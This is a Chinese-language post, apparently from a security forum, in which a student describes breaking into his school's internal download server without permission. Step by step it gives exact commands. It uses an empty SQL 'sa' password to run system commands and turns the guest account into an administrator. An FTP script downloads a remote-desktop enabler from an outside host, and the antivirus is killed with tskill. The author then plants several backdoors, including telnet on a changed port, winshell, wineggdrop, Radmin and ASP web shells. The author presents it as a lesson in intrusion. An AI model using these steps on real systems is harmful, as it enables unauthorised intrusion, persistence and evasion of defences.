网络安全 频道

记一次对学校DHCP服务器的入侵渗透过程

前言:
我所处的网络是一个学校内部的校园网, 所有寝室里的电脑全部靠学校一台DHCP服务器自动分配IP地址上网. 不知道为什么最近一段时间,学校的网络不太稳定,而且同学的机器安全越来越好.几乎很难入侵. 后来知道是学校为学生开设了一个WEB地址,里面有防毒软件下载
出于对技术的追求.对于个各杀毒软件的测试,可以更好的保护我们的后门程序.
我也上去下载了安装玩玩.( 网络卫士).
不安装还好,一装,差点没把我的气死. 除了能够杀出几百年前的那些黑客工具之外. 一些后程序本根发现不了.老报告.你的机器安全.可以放心使用.晕.什么软件啊.
气归气吧.出于本能,突然有种想对这个下载的站进行一次安全性测试,看看能不能入侵.
因为是内网的服务器提供的,软件下载功能.我就没用内鸡.而直接对其入侵分析.
let 's go

一.准备工具:

1. x-scan扫描器.
2. supersqlexec (mssql连接器)
3.2k3389 (开3389)
4.c3389 (改3389)
5. winshell 后门程序
6.wineggdrop 后门程序
7.Remote Administrator 2.1中文版 (永不被杀)
8.tftpd32小型FTP服务器
9. tskill.exe 杀掉系统防毒软件进程
二.收集主机信息.

打开x-scan ,在扫描模块中,选中全部模块,对其进行全面的信息收集.,然后在扫描参数选项卡中,指定IP范围里就填入: 172.16.1.250 就是提供软件下载的服务器IP地址.
一切设置完成后,就点击"扫描"接钮. 不出20分钟,扫描已经完成.查看了一下扫描信息.
**.眼睛一亮.有个SQL弱口令(sa密码为空).我真不敢相信自己的眼睛.这年头这类东西还存在的啊.
不管了.拿出supersqlexec 填入IP,帐号为:SA,密码既然是空,我就不填了. 点击"连接".
突然弹出"连接成功"对话框. 看来真的存在这个漏洞. 那我们还等什么,dir查看一下再说了.
发现系统目录在 c:\winnt\system32.
再用 net start 查看了一下,系统服务.发现里面安装了一些常规服务外,还有个防毒软件(网各卫士) .
再用 net user 查看了一下系统中存在的所有用户.发现除了管理员帐号跟guest 帐号外,还有个 why 帐号. 和TsInternetUser.(TsInternetUser帐号的存在说明这台机器是server) 管它呢. 先加个自己的帐号在里面吧. 但建立新帐号太明显.怕被发现.
我还是看一下guest帐号吧.在它身上做点文章.
net user guest 发现这个帐号没被启用.
那真是太好了.我马上把它击活 net user guest /active:yes
然后加了个密码 net user guest xuesha
接着加为管理员: net localgroup administrators guest /add
既然有了帐号. 还有对方又是server系统,我马上用终端连接器,进行连接.mstsc
输入IP.点击连接.等了近10秒种,发现连接不上" 中断远程桌面"的提示信息.
看来管理员没用开3389端口哦. 那咱办.放弃吗? 这怎么可能.太不像我的作风了. 既然可以用dos命令. 那我为何不用用 ftp 功能啊. 把开3389的端口的工具上传上去.
想到这里,说做就做.马上在 supersqlexec 的提示行中,输入命令,建立一个TXT文件,让服务器自动下载并运行程序.
过程如下:
echo open www.tmwl.net >up.txt
echo tmwl >>up.txt
echo XXXX >>up.txt
get 2k3389.exe >>up.txt
bye >>up.txt
为了正实,这个文件确实建立成功. 我用type up.txt查看了下. 一切OK.这下就有好戏上场了.
在提示行中输入: ftp -s:up.txt .然后回车.
如果不出意外,几秒钟后,就会提示,文件下载成功.
dir 2k3389.exe /s 查找了一下,果然发现文件已经下载成功了.
我想每个人,做到这一步的时候,心情一样跟我开心.有种说不出的喜乐.
还等什么啊. 运行 2k3389.exe 程序哦. 等服务器重启上来后, 一台3389(内网肉鸡产生了).我等啊等. 10分钟以后,我用mstsc 再次连接. 果然出现登录终端的提示界面.
一阵惊喜,在用户名处输入: guest 刚刚建立的帐号
在密码处输入: xuesha 密码
回车.
一阵不安的等待. 一个模糊的新桌面出现在我的前面.哈哈............各位. 我已经成功进入了


先申明一下. 系统开3389加新建帐号.只是一个后门安制方法. 为了以后我能完全控制这个服务器.接下来,我给它一连开了4个telnet后门.

第二个后门:
这个后门,我当然是把服务器内部自带的 telnet 服务给打开. 好让下次可以在命令提示符下控制.
首先,我们对其 telnet 服务进行配制. 不要把管理员当傻子哦. 这也是为了更好的让后门只为我服务.

1. 运行 tlntadmn.exe 程序.来配制 telnet 服务. 先把 默认的 23 端口改为: 111
再改登录认证 NTLM 值.
设置完毕后,我试着 telnet 172.16.1.250 111, ,成功进入.说明这个后门做成功了.


第三个后门:
这个后门.当然是要首选 winshell 了.
为了更好的把工具上传到服务器上, 我在本地开了一个小型的 tftp服务.(有的是tftpd32)
没想到,刚上传完,就被杀了.5555555555555555555
咱办.不传了吗?NO.
我们把防毒软件的进程,杀掉就行了. 它还防我们个毛啊. 该是我们防它的时候了.
tftp -i 172.16.1.1 get tskill.exe 马上把服务器运行这个命令.
把本机的 tskill.exe 工具上传上去. 杀掉系统防毒软件进程
哈哈.这回它没戏了.
还等什么啊,把winshell服务端上传上去,并运行哦.

第四个后门:
这个后门,我用的是: wineggdrop 后门程序
这个后门程序有个特点,必须把里面自带的一个服务端跟dll文件一起复制到\winnt\system32目录下,才能正常运行的.
希望大家在使用时候,要注意到这点.

有关wineggdrop 后门程序 的服务器配制与 如何在肉鸡上安装,服务端.这里就不介绍了.
具体的使用方法,自己研究吧.


第五个后门:
Remote Administrator 2.1中文版 (永不被杀)
这是个远程控制的. 具体的使用方法,这里不介绍了.
只要你能上传到服务器上,一切好办.


第六个后门;
学校不是开了一个 web 软件下载服务嘛. 那我就放入一个 fso.asp 木马.或者cmd.asp等一些网页的木马.以备不时之需哦.

后门工具的使用方法,我这就不用介绍了.有兴趣朋友自己研究吧. 这里主要是介绍一种入侵的思路.


技术会过时,学习方法,入侵思路不会过时.只要你好好分析别人的入侵思路,结合自己的方法.我想你一定会成为一个入侵高手.
我不是什么黑客,只是对网络安全研究有所兴趣. 更惨的是我这次期未考试.网络工程只得了48分.下学期来得回学校补考.真不知道是中国教育界的悲哀.还是学校在误人子弟.
2
相关文章